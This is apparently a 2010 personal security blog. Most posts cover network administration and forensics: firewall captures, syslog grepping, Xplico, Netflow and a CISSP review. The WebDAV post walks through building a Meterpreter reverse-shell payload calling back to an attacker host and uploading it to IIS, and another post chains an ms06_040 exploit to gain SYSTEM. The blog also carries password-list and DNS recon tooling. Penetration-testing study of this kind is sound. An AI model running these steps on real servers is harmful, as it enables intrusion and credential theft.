Thursday, November 4, 2010

Exporting Packet Captures - Multi-Context FWSMs

I came across an interesting scenario today that was worth sharing. I'm in charge of a multi-context Cisco FWSM (firewall services module). Today, while troubleshooting an issue I ran a packet capture to analyze the problem which is normally one of the first things I do.

I realized I had done this capture on a context which did not have a management IP address (don't ask). Not having any way to directly route to the context meant that my usual method of downloading the capture in *.pcap format wouldn't work via a browser, so what to do?

After some searching around, I discovered that you could simply use TFTP through the FWSM's system context to obtain the file...problem solved!

FWSM# copy /pcap capture:examplecontext/in-cap tftp:

FWSM# copy /pcap capture:public/skid-capture.pcap tftp:
Source capture name [public/skid-capture]?
Address or name of remote host []? 1.1.1.1
Destination filename [skid-capture.pcap]?
!!!!!!
111 packets copied in 1.200 secs (111 bytes/sec)

Wednesday, November 3, 2010

Determining When Devices Hit the Wire

Often I will find myself needing to determine when a device comes back online. The reasons are numerous, but it could be as simple as waiting for a device to complete a reboot or it could be that a pesky, malware-laden device which only pokes its head online for short durations each day. Back in the day, it would likely take a continuous ping running in the background to determine when the device comes online, although who wants to continuously monitor a ping? Also, if I wasn't at my computer at that particular moment then I may never be the wiser.

To tackle these scenarios, I thought it would be personally useful if there was an automated method of notification so that this process could all be done in the background for me, and I could continue whatever work I was doing without having to micro-manage a ping.

For me, I felt it would be great if an email notification could be used since I could use Outlook's preview window in conjunction with my ping to quickly break me away from what I was doing to allow my investigation to begin when the device in question came back online. My first attempt at this was using a simple ICMP echo (type 8) to determine device's status. When the device came back online, I used the Linux sendEmail program to email me with the status update. The result was a short little bash script and the code that follows.

#!/bin/bash

echo "Please enter the IP address or FQDN of the host you are interested in: "
read ipaddress

echo -e "\nPlease enter Exchange password (Used for sendEmail Purposes): "
read -s PASSWORD

while :
do
ping -c 1 $ipaddress > /dev/null
if [ $? -eq 0 ]; then
sendEmail -f (enter from address) -t (enter your email address) -u Commence the Investigation!!! -m Host $ipaddress is back online! -s (enter SMTP relay server):25 -xu (enter username) -xp $PASSWORD -o tls=no
break
fi
done



As you can see, nothing too special here. The script simply ran a ping in loop, where it would send a single ICMP type 8 echo packet and wait for an ICMP echo-reply (type 0) to return. Now, there are a couple glaring problems with this, most notably what happens if the device in question doesn't respond to ICMP because it is behind a firewall, for example? To overcome some of the limitations with using ICMP, I came up with a second script that makes calls the fantastic Nmap in order to customize the types of probes used to determine a device's online status.

#!/bin/bash

NMAP=/usr/bin/nmap
NMAPOPTIONSLINUX="-n -PN -sS -p22,25,53,80,110,143,443 -PA22,53,80,443"
NMAPOPTIONSWIN="-n -PN -sS -p135-139,445,1025 -PA135-139,445,1025"
NMAPOPTIONSCISCO="-n -PN -sS -p22,23,80,443"

function Linux {
while :
do
$NMAP $NMAPOPTIONSLINUX $IPADDYLINUX > nmap.txt
cat nmap.txt | grep "Host is up" > /dev/null
if [ $? -eq 0 ]; then
sendEmail -f (from email address) -t (to email address) -u Commence the Investigation!!! -m Host $IPADDYLINUX is back online! -s (SMTP relay server) -o tls=no
break
fi
done
}

function Windows {
while :
do
$NMAP $NMAPOPTIONSWIN $IPADDYWIN > nmap.txt
cat nmap.txt | grep "Host is up" > /dev/null
if [ $? -eq 0 ]; then
sendEmail -f (from email address) -t (to email address) -u Commence the Investigation!!! -m Host $IPADDYLINUX is back online! -s (SMTP relay server) -o tls=no
break
fi
done
}

function Cisco {
while :
do
$NMAP $NMAPOPTIONSCISCO $IPADDYCISCO > nmap.txt
cat nmap.txt | grep "Host is up" > /dev/null
if [ $? -eq 0 ]; then
sendEmail -f (from email address) -t (to email address) -u Commence the Investigation!!! -m Host $IPADDYLINUX is back online! -s (SMTP relay server) -o tls=no
break
fi
done
}

function Menu {
clear
cat > /dev/stdout <<DELIM

========================================================
Please Select the Appropriate Device Type
[L]inux or Unix
[W]indows
[C]isco
[Q]uit
========================================================

DELIM

read DEVICETYPE
clear

shopt -s nocasematch
if [[ $DEVICETYPE = *L* ]]; then
echo "Please input IP address of Linux/Unix device:"
read IPADDYLINUX
echo -e "Thank You, An Email Will Be Sent When Host is Back Online...\n"
Linux
elif [[ $DEVICETYPE = *W* ]]; then
echo "Please input IP address of Windows device:"
read IPADDYWIN
echo -e "\nThank You, An Email Will Be Sent When Host is Back Online...\n"
Windows
elif [[ $DEVICETYPE = *C* ]]; then
echo "Please input IP address of Cisco device:"
read IPADDYCISCO
echo -e "\nThank You, An Email Will Be Sent When Host is Back Online...\n"
Cisco
elif [[ $DEVICETYPE = *Q* ]]; then
echo -e "\n\nGoodbye, and thank you for being the Network Police!"
exit 0
else
echo "Sorry, --> $DEVICETYPE <-- is an Unknown Selection"
echo "Press Enter to Continue..."
read
Menu
fi
shopt -u nocasematch
}

Menu



Besides a more polished look, this will actually cater the TCP probes based on the type of device in question. I customized the Nmap options based on personal experience with various types of OS. As with the ICMP script, it will wait for a device to come back online before notifying via email. Both of these bash scripts were written using the Linux Backtrack4 distro. Note that I did not require authentication on the SMTP relay server in the latter script.

Thursday, July 29, 2010

Manipulating Cisco Firewall Syslogs Using Linux Command Line

Recently, I've been doing a lot of firewall log auditing for various reasons. My Cisco firewalls send their logs to a centralized syslog server and are Gzipped, so the file sizes don't get out of control, once an hour.

I'm doing my analysis on a Linux box (BT4 distro) with limited disk space and many of the commands I like to use aren't installed on the syslog server. With these obstacles in place, here is how I've been dealing with the Gigs of syslog messages to get what I really want.

The first step was simply to grab 24 hours worth of log messages and this was as simple as FTP'ing into the syslog server and performing an "mget" on the date I desire. Now I have a lot of gzipped syslog files waiting for me to play with.

root@bt# ls -la
total 2915188
drwxr-xr-x 2 root root 4096 2010-07-28 14:01 .
drwxr-xr-x 48 root root 4096 2010-07-22 16:18 ..
-rw-r--r-- 1 root root 62478364 2010-07-27 15:25 fwsm.log.20100726.0000.gz
-rw-r--r-- 1 root root 64624441 2010-07-27 15:25 fwsm.log.20100726.0100.gz
-rw-r--r-- 1 root root 58798851 2010-07-27 15:25 fwsm.log.20100726.0200.gz
-rw-r--r-- 1 root root 57448529 2010-07-27 15:25 fwsm.log.20100726.0300.gz
-rw-r--r-- 1 root root 57916715 2010-07-27 15:25 fwsm.log.20100726.0400.gz
-rw-r--r-- 1 root root 58860324 2010-07-27 15:26 fwsm.log.20100726.0500.gz
-rw-r--r-- 1 root root 68676596 2010-07-27 15:26 fwsm.log.20100726.0600.gz
-rw-r--r-- 1 root root 78945716 2010-07-27 15:26 fwsm.log.20100726.0700.gz
-rw-r--r-- 1 root root 112321501 2010-07-27 15:26 fwsm.log.20100726.0800.gz
-rw-r--r-- 1 root root 169440875 2010-07-27 15:27 fwsm.log.20100726.0900.gz
-rw-r--r-- 1 root root 209838484 2010-07-27 15:27 fwsm.log.20100726.1000.gz
-rw-r--r-- 1 root root 227651887 2010-07-27 15:27 fwsm.log.20100726.1100.gz
-rw-r--r-- 1 root root 233153646 2010-07-27 15:28 fwsm.log.20100726.1200.gz
-rw-r--r-- 1 root root 244517081 2010-07-27 15:29 fwsm.log.20100726.1300.gz
(/snip)


Since I don't necessarily want to uncompress all the files just to inspect the contents, I'm going to use the nifty "zcat" command which does the same thing as "cat" but on a zipped file. Here is what the syslog format looks like on a Cisco firewall with no field manipulation.

root@bt# zcat fwsm.log.20100726.0000.gz | more
Jul 25 23:00:00 firewall main %FWSM-6-302013: Built outbound TCP connection 146767145916591362 for inside:1.1.1.1/2359 (1.1.1.1/31921) to outside:66.166.52.133/80 (66.166.52.133/80)


As you can see here, it is simply an outbound web session initiated from one of my internal hosts (IP changed to protect the innocent) destined for a web server on Covad's IP block. In this particular adventure, I'm trending for any outbound telnet sessions leaving the boundary of my network. Obviously, telnet is not a preferred transport mechanism, and that multiplies when leaving the internal network and crossing the Internet. Telnet is not encrypted and any snooping on the network can reveal the contents being transferred including usernames, passwords, etc. The first thing I want to do is find a sample telnet session, although the format will be identical the the syslog message above. My syntax includes a "Built outbound" as I don't want to see all the deny messages...also don't forget the space character after the /23. If you forget to include that then you'll get a lot of port numbers which include "23" such as 2300, 23000, etc.

root@bt# zcat fwsm.log.20100726.0000.gz | grep "Built outbound TCP" | grep "/23 " |more
Jul 25 23:06:17 firewall.example.com main %FWSM-6-302013: Built outbound TCP connection 146569495816626096 for inside:1.1.1.1/1366 (1.1.1.1/1366) to outside:166.111.30.174/23 (166.111.30.174/23)
Jul 25 23:30:55 firewall.example.com main %FWSM-6-302015: Built outbound TCP connection 146634027700247405 for inside:1.1.1.2/35886 (1.1.1.1/25685) to outside:91.213.175.139/23 (91.213.175.139/23)


Great, that worked like a champ as we can see in the example above. At this point it should be worth noting that there are multiple ways to skin this cat. We can combine search terms using grep, or simply use the more powerful sed/awk combination. For the purpose of this example, I'm trying to keep things simple so many of the syntax examples can be shortened and sped up. Perhaps this can be an exercise for a later time...

With my sample telnet violator message format handy, I now am interested in finding any source address participating in a telnet session from within my network. We'll also want to know who they talk to but we'll get to that in a moment. Here is how I manipulated the data fields to accomplish what I wanted. I simply used the built in Linux "cut" command to clean up the syslog format and then followed that with the "sort" "uniq" combination. This left me with exactly what I wanted. Before moving on, I save all these addresses into an Excel document so I can come back to them later. This could also be done a little quicker by first writing your data into a seperate text file before manipulation but, as mentioned earlier, I'm limited on disk space (and will be creating a file in a minute) so this was a fine compromise.

root@bt# zcat fwsm.log* | grep "Built outbound TCP" | grep "/23 " | cut -f5 -d ":" | cut -f1 -d "/" | sort | uniq
1.1.1.1
1.1.1.2
1.1.1.3
1.1.1.4
(/snip)


Okay, for the next phase, I want a text file containing all syslog messages related to built telnet sessions. I will be using this text file when I examine destination addresses connected to from the list of source addresses in my Excel document. To do this is rather easy, and covered earlier...the only difference is we'll be redirecting the output into a file instead of to the screen buffer.

root@bt# zcat fwsm.log* | grep "Built outbound TCP" | grep "/23 " > telnet-list.txt
root@bt# ls -la | grep "telnet"
-rw-r--r-- 1 root root 8785 2010-07-29 12:32 telnet-list.txt


In order to find destination addresses for my source IPs, I write a little bash script which allows me to do this. I call the script "telnet-lookup.sh" and it looks like this.

root@bt# nano telnet-lookup.sh
#!/bin/bash
cat telnet-list.txt | grep $1 | grep "Built outbound TCP" | cut -f6 -d ":" | cut -f1 -d "/" | sort | uniq

root@bt# chmod 755 telnet-lookup.sh
root@bt# ./telnet-lookup.sh 1.1.1.1
74.22.17.99
98.136.48.48
147.55.32.107


Simply repeat this on all source IPs and you now have a working matrix you can use to continue investigating why these flows are occurring...

Thursday, June 3, 2010

Using Chained Exploits - Metasploit and Meterpreter

There are certain situations where a successful exploit may leave us a shell, however that shell does not have SYSTEM/ROOT level privileges. As an example, I've obtained a Windows Meterpreter (reverse TCP) shell using a WebDAV exploit as explained earlier on this blog. This session has the rights of the web daemon, which are not enough to do most of the fun stuff.


meterpreter > getuid
Server username: USER\IWAM_USER
meterpreter > hashdump
[-] Unknown command: hashdump.
meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: 87


After exhausting most of the local privilege escalation techniques I could think of (both using Meterpreter's built-in capabilities and uploading executable code on my target), I decided upon another approach. What if i could chain a second exploit and piggy back it off of my existing Meterpreter session? Fortunately, the developers of Metasploit implemented a neat feature that will allow me to do this very thing.

The route command actually can be configured to route all traffic through an existing Meterpreter session. As you can see, the following steps led me from frustration to GAME OVER. In this example, this was Meterpreter session four (which is the last argument in the route add syntax).

msf exploit(handler) > route add 127.0.0.1 255.255.255.255 4
msf exploit(handler) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
127.0.0.1 255.255.255.255 Session 4

msf exploit(handler) > use exploit/windows/smb/ms06_040_netapi
msf exploit(ms06_040_netapi) > set RHOST 127.0.0.1
msf exploit(ms06_040_netapi) > exploit

[*] Started reverse handler on 192.168.1.2:13337
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:127.0.0.1[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:127.0.0.1[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Sending stage (748032 bytes) to 192.168.1.3
[*] Meterpreter session 8 opened (192.168.1.2:13337 -> 192.168.1.3:4855) at Thu Jun 03 16:48:41 -0400 2010

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Tuesday, May 11, 2010

Hacking IIS via WebDAV

Often, as pentesters, we will run into web servers running WebDAV. WebDAV is convenient for developers as it allows them to remotely edit and manage files on web serves. For the same reason that make it helpful for them, it can also leave it vulnerable to compromise. In this example, I've run across an IIS box running a very old version as reported by my Nmap scan.
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS webserver 5.1
Just to verify the results, I'll use Netcat to grab the banners off the box. It also verifies what Nmap reported.
#nc 1.1.1.1 80 -vv
(UNKNOWN) [1.1.1.1] 80 (www) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1

sent 17, rcvd 276
Once we are reasonably confident in our findings, let's scan for WebDAV. Essentially we want to know if it is present and what capabilities are active.

I use Metasploit and its built-in scanning modules for most of my follow-up steps. There are a few auxiliary modules that work brilliantly.
msf > use scanner/http/webdav_website_content
msf auxiliary(webdav_website_content) > set RHOSTS 1.1.1.1
msf auxiliary(webdav_website_content) > run
[*] Found file or directory in WebDAV response (1.1.1.1) http://1.1.1.1/scripts/

msf auxiliary(webdav_website_content) > use scanner/http/webdav_test
msf auxiliary(webdav_test) > set RHOSTS 1.1.1.1
msf auxiliary(webdav_test) > set PATH /scripts
[*] 1.1.1.1/scripts (Microsoft-IIS/5.1) has unknown ENABLED
[*] 1.1.1.1/scripts (Microsoft-IIS/5.1) Allows Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
[*] 1.1.1.1/scripts (Microsoft-IIS/5.1) Has Public Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
[*] Attempting to create /scriptsWebDavTest_4OpejeyCdj
[*] 192.168.13.203/scripts is WRITEABLE
[*] Checking extensions for upload and execution
[*] Prohibited file types ASP, EXE
Considering that the server is filtering certain types of file extensions, we'll need to upload our payload using something safe; in this example I'll use .txt. Before we upload, we'll first need to create the payload so I'll setup a reverse meterpreter payload for Windows using port 1337. Here is how you would create the payload using the built-in Metasploit tools msfpayload and msfencode.

How-to: <span class="blsp-spelling-error" id="SPELLING_ERROR_18">DNS</span> Enumeration
cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=2.2.2.2 LPORT=1337 R | ./msfencode -o evilpayload.asp
Now we realize we can't upload .asp files directly to the webserver so we'll get a little tricky. Earlier our WebDAV scans indicated we were able to execute the COPY command so this is where we will use it. Before we move to that, let's get our listener ready.
./msfconsole
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 2.2.2.2
set LPORT 1337
exploit
To make uploading the file easy, I found a neat tool named davtest which makes the heavy lifting very manageable. The program can be found here. The following syntax will take our meterpreter payload and upload it to the server using a .txt file extension.
./davtest.pl -url http://1.1.1.1/scripts/ -uploadfile/root/evilpayload.asp -uploadloc evilpayload.asp.txt
Browse to the server's script directory to ensure you see the new .txt file. The last major hurdle to tackle is renaming our file. Here is where we take advantage of the WebDAV COPY function. Netcat into the server and execute the following code.
nc 1.1.1.1 80 -vv
COPY /scripts/evilpayload.asp.txt HTTP/1.1
Host: 1.1.1.1
Destination: http://1.1.1.1/scripts/evilpayload.asp
Overwrite: T
Assuming this was successful, simply click on the newly created evilpayload.asp file and a meterpreter shell will be returned in your multi/handler session. In most cases, the limitation will be on local privilege (determined by what privilege IIS is running).

Friday, May 7, 2010

Installing CeWL in BT4

A great way to build custom password lists to feed into password crackers is by profiling the target’s websites using CeWL. More information on CeWL can be found here: CeWL - DigiNinja

Getting CeWL installed on BT4 takes a little bit of work. Since I just got done doing this very thing, i figured I'd share the steps needed to do the trick. The first thing to do is download the latest version of Ruby Gems (BT4 comes with 1.2.0, I believe).

wget http://rubyforge.org/frs/download.ph...gems-1.3.6.tgz
tar -xvf rubygems-1.3.6.tgz
rm rubygems-1.3.6.tgz
cd rubygems-1.3.6/
ruby setup.rb
gem –v (verifying the version is 1.3.6)

Once this is complete, download the latest version of CeWL from the project's website.

cd /pentest/passwords
wget digininja.org/files/cewl_3.0.tar.bz2
tar –xvjf cewl_3.0.tar.bz2
rm cewl_3.0.tar.bz2
cd cewl

Now there are some dependencies needed to run the program.

apt-get install libxml2-dev libxslt-dev libimage-exiftool-perl
gem install mime-types archive-tar-minitar nokogiri echoe hoe rcov zip rubyzip mini_exiftool http_configuration spider hpricot
export RUBYOPT=rubygems

Once we’re at this point, test it out and make sure it is functional.

./cewl.rb -d 2 -v VICTIM_URL

Assuming it works you can now begin creating custom password lists based on our target of choice.

Monday, March 29, 2010

Bash Script - DNS Enumeration

Part of any good reconnaissance work is enumerating your target. Normally you look for the "low hanging fruit" and what information is readily available to you.

I like to use DNS as an ally since the information is freely available and, if done correctly, it is relatively quiet.

I've written a couple small bash script to automate the process of collecting this information which can be a handful if done manually.

The first thing required is a text file called 'dns.txt' which will store a list of well known host names. This file will be called by the script when it attempts to enumerate available hosts. Entries in this file will include expected values for publicly available hosts. Listed below are my values, but your mileage may vary.

www
www1
www2
web
dns
dns1
dns2
ns
ns1
ns2
ns3
mail
mailhost
smtp
outlook
imap
pop
webmail
vpn
extranet
portal
proxy
secure
cisco
router
gateway
fw
fwsm
firewall
ftp
tftp
news
portal
news
blog
test
honeypot
backup
linux
oracle
unix
search
forum



In the same directory create a new file named DNSGrab.sh and give it executable rights if desired "chmod 755 DNSGrab.sh"

#!/bin/bash
echo -e "\nThis script will allow you to look for publically available hosts"
echo "You can perform a query either by selecting a target domain or /24 network"
echo "Would you like to [domain] scan or [subnet] enumerate?"
read answer
if [ $answer = "domain" ]; then
echo "What domain would you like to scan?:"
echo "example 'domain.com'"
read domain
echo -e "\n"
for name in $(cat dns.txt);do
host $name.$domain | grep "has address"
done
elif [ $answer = "subnet" ]; then
echo "Please enter Class C Subnet which you'd like to enumerate:"
echo -e "example 192.168.20\n"
read subnet
for octet in `seq 1 254`;do
host $subnet.$octet | grep "name pointer" | cut -d" " -f1,5
done
else
echo -e "\nExpected 'domain' or 'subnet' as input, script exiting..."
fi




This script will simply do one of two things based by the user input of "domain" or "subnet". If "domain" is chosen it will quickly scour DNS looking for any hosts matching those in the dns.txt file. For example, if you chose google.com then it would try resolving ns.google.com, ns1.google.com, and on down the line. This can be a great for spotting discontinuous subnets and discovering information about network topologies, etc.

If "subnet" is chosen then it will do a lookup of all hosts on a given /24. Examples of each are listed below:

# ./DNSGrab.sh

This script will allow you to look for publically available hosts
You can perform a query either by selecting a target domain or /24 network
Would you like to [domain] scan or [subnet] enumerate?
domain
What domain would you like to scan?:
example 'domain.com'
hp.com


www.hpgtm.nsatc.net has address 15.201.49.22
www.hpgtm.nsatc.net has address 15.216.110.22
ns1.hp.com has address 15.219.145.12
ns2.hp.com has address 15.219.160.12
ns3.hp.com has address 15.203.209.12
mail.hp.com has address 15.192.0.152
smtp.hp.com has address 15.201.24.91
webmail.hp.com has address 16.230.34.78
extranet.hp.com has address 16.110.176.200
extranet.hp.com has address 16.228.52.17
extranet.hp.com has address 16.230.58.17
extranet.hp.com has address 16.234.58.17
extranet.hp.com has address 16.236.203.17
extranet.hp.com has address 16.238.58.17
portal.hp.com has address 16.232.36.204
ftp.hpgtm.nsatc.net has address 15.192.45.27
ftp.hpgtm.nsatc.net has address 15.216.110.132
usenet01.boi.hp.com has address 15.8.40.106
portal.hp.com has address 16.232.36.204
usenet01.boi.hp.com has address 15.8.40.106
linux.hp.com has address 192.6.234.9
linux.hp.com has address 192.151.53.86
oracle.hardingmarketing.com has address 66.35.221.168
www.hpgtm.nsatc.net has address 15.216.110.22
www.hpgtm.nsatc.net has address 15.201.49.22
search.hpgtm.nsatc.net has address 15.192.0.84



# ./DNSGrab.sh

This script will allow you to look for publically available hosts
You can perform a query either by selecting a target domain or /24 network
Would you like to [domain] scan or [subnet] enumerate?
subnet
Please enter Class C Subnet which you'd like to enumerate:
example 192.168.20

16.232.36
1.36.232.16.in-addr.arpa vip-iba-16-236-36-0-gw.houston.hp.com.
2.36.232.16.in-addr.arpa cce01gwdc509-vlan265.houston.hp.com.
3.36.232.16.in-addr.arpa cce01gwdc510-vlan265.houston.hp.com.
4.36.232.16.in-addr.arpa cce01swdclb511-265.houston.hp.com.
5.36.232.16.in-addr.arpa cce01swdclb512-265.houston.hp.com.
6.36.232.16.in-addr.arpa cce01swdclb511-265-alias.houston.hp.com.
7.36.232.16.in-addr.arpa vip2-g3w1945c.houston.hp.com.
8.36.232.16.in-addr.arpa vappnestpro3.houston.hp.com.
9.36.232.16.in-addr.arpa gvu3727.houston.hp.com.
10.36.232.16.in-addr.arpa oispro-llb3.houston.hp.com.
11.36.232.16.in-addr.arpa gvu4394.houston.hp.com.
12.36.232.16.in-addr.arpa gvu4395.houston.hp.com.
13.36.232.16.in-addr.arpa gvu4442.houston.hp.com.
16.36.232.16.in-addr.arpa cce01-c509-nat265.houston.hp.com.
21.36.232.16.in-addr.arpa g3w0266.houston.hp.com.
(/snip)



If you want to test out the configuration of the DNS servers on a given domain, I've written an automated method to do that too. Follow the same steps as above and call this file "ZTransfer.sh". Here is the script:

#!/bin/bash

echo "Please enter domain:"
read domain

for ns in $(host -t ns $domain | cut -d" " -f4);do
host -l $domain $ns | grep "has address" > $domain.txt
done
if [ ! -s "$domain.txt" ]; then
echo "Zone Transfer Failed!"
rm "$domain.txt"
else
echo "Zone Transfer Completed Successfully!"
fi



Simply put, this will attempt a zone transfer on a user inputted domain name. It goes without saying that you shouldn't do this unless you have permission to do so. It would be appropriate for pen testers and DNS admins looking to test the security of their configurations.

These were written and tested on a BT4 distro, feel free to modify as needed...

Friday, February 26, 2010

First Python Script - Simple Windows Query Tool

Decided to take up Python based on rave reviews from all the programmers I work with. For my first go at it, I wrote a simple little program that will remotely grab information off of remote Windows machines as part of investigations. This was written in Python 3.x so I can't guarantee compatibility with Python 2.x.

The program makes calls to the PSTools suite as well as Nmap so make sure that both are installed and listed in your environmental variable path.

When run, the program will scan the remote target using Nmap looking for well known Windows ports. If it sees the remote workstation online, it will continue to grab a wealth of information from the target and store that information into individual text files.

"""
HostQuery.py
Author: Skid Rock 02.26.2010
Target Users: Individuals Conducting Windows Machine Investigations
Target System: Remote Windows Workstations
Syntax: HostQuery.py <enter>
"""

version = 0.1

import sys,os,string,time

machine = input('\nPlease Enter Workstation IP Address:')
os.system("nmap -sS " + machine + " -p 135,139,445 > scan.txt")

for line in open("scan.txt"):
if "Host is up" in line:
print ("\nHost " + machine + " appears to be online, grabbing information...\n")
os.system("psinfo -sc \\\\" + machine + " >" + machine + ".info.txt")
os.system("pslist \\\\" + machine + " >" + machine + ".list.txt")
os.system("psloggedon \\\\" + machine + " >" + machine + ".loggedon.txt")
os.system("psfile \\\\" + machine + " >" + machine + ".file.txt")
os.system("psloglist \\\\" + machine + " -d 7 -s Security >" + machine + ".eventlog.txt")
os.system("psexec \\\\" + machine + " netstat -bnv >" + machine + ".netstat.txt")
print ("\n\nCommand Completed Successfully...\n")
exit
else:
if "Host seems down." in line:
print ("\n\nHost " + machine + " appears down, or is not a Windows based OS, exiting...\n")
exit

Wednesday, February 24, 2010

Xplico - Network Forensics



Finally had a chance to play with Xplico, recently updated to version 0.5.5. For those not familiar with Xplico, please visit the development page here.
In short, Xplico is an open source tool designed to aid in dissecting large network captures in .pcap format. It can also do live captures and report on sessions as they get discovered. Installing Xplico is not trivial, and required some trial and error on my part so here are the cliff notes based on an Ubuntu 9.10 installation.
apt-get install tcpdump tshark apache2 php5 php5-sqlite build-essential perl zlib1g-dev libpcap-dev libsqlite3-dev php5-cli libapache2-mod-php5 libx11-dev libxt-dev libxaw7-dev python-all sqlite3 recode libmysqlclient15-dev

cd/tmp
mkdir xplico_install
cd xplico_install
wget http://sourceforge.net/projects/xplico/files/Xplico%20versions/version%200.5.5/xplico-0.5.5.tgz/download
tar zxvf xplico-0.5.x.tgz
wget http://geolite.maxmind.com/download/geoip/api/c/GeoIP-1.4.6.tar.gz
tar zxvf GeoIP-1.4.6.tar.gz
cd GeoIP-1.4.6
./configure
makecd ..
rm -f GeoIP-1.4.6.tar.gzcd xplico-0.5.5
wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
gzip -d GeoLiteCity.dat.gz
rm -f GeoLiteCity.dat.gz
make
cd ..
wget http://mirror.cs.wisc.edu/pub/mirrors/ghost/GPL/ghostpdl/ghostpdl-8.70.tar.bz2
tar jxvf ghostpdl-8.70.tar.bz2
rm -f ghostpdl-8.70.tar.bz2
cd ghostpdl-8.70make (this will take some time so go get coffee or something)
cd ..
cp ghostpdl-8.70/main/obj/pcl6 xplico-0.5.5
rm -rf ghostpdl-8.70
cd xplico-0.5.5
make install
cp /opt/xplico/cfg/apache_xi /etc/apache2/sites-enabled/xplico

- Edit this file by adding as follows /etc/apache2/ports.conf
# xplico Host port
NameVirtualHost *:9876
Listen 9876

- You will also have to edit the php.ini file located here /etc/php5/apache2/php.ini.
Find and modify both of these lines:post_max_size = 200M
upload_max_filesize = 100M

a2enmod rewrite
/etc/init.d/apache2 restart


Once you get this laundry list complete, simply fire up Firefox and launch URL http://127.0.0.1:9876 (if on local box) or http://(ip address):9876 if accessing remotely. Version 0.5.5 has a default username/password combination of xplico/xplico.

The first thing you'll want to do after logging in is create a new case. Xplico uses cases as top level and session as bottom level for all investigations. The screenshot below shows a session named example with multiple .pcap files uploaded and decoded by Xplico.


Navigating around the interface is fairly self explanatory but I've found it does a great job with decoding specific high level applications such as HTTP and FTP. Others may find value in its ability to decode Facebook chat and various types of email.

To reconstruct HTTP sessions, set Firefox's proxy settings to Xplico (below is a screenshot assuming Xplico is being run on localhost).




Click on the Web menu item and select what you want to view. In this case, I am looking at HTML. Select the HTTP conversation you want to inspect and click on the URL recorded by Xplico. It will reconstruct the HTTP session and display the session in a new window.

Future posts will go into more depth on Xplico as I have an opportunity to use it in real-world investigations. Kudos to the Xplico development team on a very promising tool...

Monday, February 22, 2010

Beginner's Setup Guide - Scrutinizer Netflow Analyzer

Scrutinizer is a Netflow repository tool created by Plixer. It provides a very intuitive GUI front-end that allows network administrators to quickly use collected Netflow data for auditing, troubleshooting, and reporting purposes.

There are two versions of Scrutinizer, both a free and paid version. Note that the free version dumps the database every day at midnight so you are limited in long term analysis capabilities.

The following text assumes that you have a working knowledge of Netflow.

Scrutinizer “listens”; it does not poll network devices. This means that the configuration is very simple and is very common for Cisco devices. Listed below are very basic commands used to enable Netflow exportation on a Cisco 6500 device. Some of these commands are unique to the 6500 platform and will not be required on an ISR router, for example. Those unique platform commands are bolded below.

ip flow-export source Loopback0
ip flow-export version 5
ip flow-export destination 192.168.1.1 9996
ip flow ingress layer2-switched vlan 10-11
ip flow-cache timeout active 1
ip flow-cache timeout inactive 15
mls nde sender version 5
mls aging long 64
mls aging normal 64
interface Vlan10
ip route-cache flow
interface Vlan11
ip route-cache flow
access-list 10 remark SNMP-access-list RO
access-list 10 permit 192.168.1.1
snmp-server community snmpread RO 10

Further information on setting up Netflow can be found here and here.


Setting up your Scrutinizer installation to be accessible remotely is as simple as finding the configuration file located in the "*\scrutinizer\apache2\conf\httpd.conf" file and replacing "ServerName localhost:8080" to something of your liking such as "Servername .domain.com:8080". Once completed, you can log in via a web browser (just remember to include the port of 8080 after the URL).

This will get your base installation completed, in future posts I'll go over how to configure Scrutinizer so you can get started with the Netflow analysis.

Wednesday, February 17, 2010

Impressions of CISSP

The CISSP is a certification governed by ISC2. It's an industry certification focusing on a variety of information security topics. In most cases I've seen, prospective employers either require it, or hold the certification in high esteem.

After going through the studying and taking of the test, here are some brief facts:

  • The test consists of 250 multiple choice questions.
  • Test taker has six hours to complete the test.
  • Test consists of a booklet (containing questions) and Scantron with number two pencils for the answers (yes, the same Scantron sheets used in grade school in the 80s and 90s.
  • Test costs $600 to take.
I found some very odd things concerning the test taking procedure. For example, this is a six hour test that you're expected to finish in one seating. There was no coffee, or sugar provided so you need to be on top of your game for an awfully long time. As far as I could tell, food and drink was permitted however there was no literature provided recommending that candidates do so. Now any test would be difficult to remain sharp for over that length of time but when you're filling out multiple choice questions over a six hour period any brain will begin to fatigue as the letters all blend into one another.

ISC2 is a non-profit organization so why am I paying $600 for a pencil and Scantron test? Where exactly does my money go? Also, for a security test I did not get searched for any electronic devices so if I had a cheat sheet on my phone then it wouldn't be hard to put it in my lap if I chose to do so. If the proctor was in fact watching, I could simply excuse myself to the restroom as that was permitted as well...

My biggest complaint is the actual content of the test though. There are ten domains that the prospective CISSP candidate is expected to master yet the test was a farce when compared to the daily experiences of a security professional. I actually had one question where the correctness of the answer simply came down to whether I knew the difference between the words "objectivity" and "subjectivity". How in the world does that make me equipped to handle real world incident response?

All in all, I think the CISSP should consider some serious revamping to bring the level of value one would expect from someone who carries the credentials.

Oh, and don't think you will get results of the test in any short time frame - took me nearly two months to find out I passed.

Monday, February 15, 2010

Pandora

If you are like me, you have A.D.D. I hate commercials with a passion, and I hate terrestrial radio nearly as much...

Long car rides can flare up my A.D.D. so I came up with a solution that made a recent four hour car ride bearable.

Stopped off at the local Apple store and purchased an auxiliary cable which allows the iPhone to plug into compatible car stereos. I watched as the clerk scanned my debit card with a wireless scanner (that drove me mental but I'll save that for another day).

Plugged my iPhone into the car stereo, and configured my own Pandora station and had commercial free music for four straight hours...